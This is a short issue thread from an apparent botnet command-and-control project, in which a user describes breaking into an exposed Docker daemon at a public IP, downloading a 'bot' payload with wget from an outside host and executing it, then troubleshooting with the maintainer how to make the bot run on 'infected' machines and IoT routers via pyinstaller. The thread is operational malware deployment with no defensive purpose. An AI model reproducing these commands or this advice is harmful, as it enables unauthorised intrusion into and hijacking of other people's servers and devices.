### ISSUE TITLE
is it a limited when this code is python?

### ISSUE THREAD

**Issue by anonsecbotnetstudent123** [NixWasHere/NebulaC2#34]
ff:~$ docker -H 168.138.15.141 exec -it b8131244cec0 /bin/sh
/app # ls
ddns-go
/app # ./
/bin/sh: ./: Permission denied
/app # wget http://1.1.1.1/bot
Connecting to 1.1.1.1:55634 (1.1.1.1:55634)
saving to 'bot'
bot                  100% |************************************************************| 5296k  0:00:00 ETA
'bot' saved
/app # chmod 777 bot && ./bot
./bot: line 0: ^���L[:�MGNU: not found
./bot: line 1: ELF: not found
./bot: line 2: syntax error: unterminated quoted string
/app #

**Comment by NixWasHere** [comment]
you arent going to use "./bot" but "python3 bot". You dont have a .py extension so linux wont recognise its a python program

**Comment by anonsecbotnetstudent123** [comment]
/app # apt install python3
/bin/sh: apt: not found
/app # yum install python3
/bin/sh: yum: not found
/app # pkg install python3
/bin/sh: pkg: not found
/app #

**Comment by anonsecbotnetstudent123** [comment]
+)i use pyinstaller to change it to file excuse in linux
+)pyinstaller --onefile -w bot.py
+)i have tested in windows when i used pyinstaller. It didn't need to install python3 to infected
=>and I think that a lots of bot like that one or IOT botnet (ex:openwrt router) can not install python3
